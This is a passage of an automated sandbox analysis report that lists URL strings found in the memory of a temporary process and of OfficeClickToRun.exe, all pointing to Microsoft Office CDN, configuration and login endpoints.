    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets43
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assetse
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-stringssepsR
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screenn
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbar
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbarment
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015854306.00000248C318B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.desktop.cshtmltml
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.mac.cshtmltmlloqs
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/gs
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/llMe6&
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/log-1
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/tlook
    Source: 872C.tmp, 00000003.00000003.1394987937.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430249735.0000000003F8B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394240204.0000000003F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fontsrapp
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abPaneK
    Source: 872C.tmp, 00000003.00000003.1394136326.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abwal-
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055774494.00000248C2C53000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/3)
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
    Source: 872C.tmp, 00000003.00000003.1430514920.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394034884.0000000005621000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430912671.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393016019.0000000005617000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392840202.000000000560D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431809017.000000000561D000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392770568.0000000005603000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393510255.000000000561D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/Cce
    Source: 872C.tmp, 00000003.00000003.1390200613.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015929363.00000248C3202000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015530791.00000248C31EA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060962016.00000248C320D000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2055051473.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040649536.00000248C3209000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisorys
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393845975.00000000055B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisoryst
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1394113903.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393133547.0000000005598000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1395207483.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.0000000005595000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1950235004.00000248C3189000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C318A000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1678127398.00000248C317E000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2014742266.00000248C3179000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000002.2060694156.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2040240300.00000248C31D5000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013432377.00000248C3169000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorizeY
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies;R
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1694509817.00000248C2D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesQRk
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393114083.0000000005589000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieswRI
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389167488.0000000003E63000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1388403613.0000000003E5A000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1390200613.0000000003E59000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392103556.00000000056FA000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389651071.0000000003E8C000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013075406.00000248C2C06000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2047270961.00000248C2C5B000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1949642856.00000248C2BFF000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2015326352.00000248C2C4C000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1664801487.00000248C30EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392156914.0000000005592000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
    Source: 872C.tmp, 00000003.00000003.1392584595.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1391964985.0000000005553000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393823050.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1431922017.000000000557B000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1429912339.0000000005553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosM
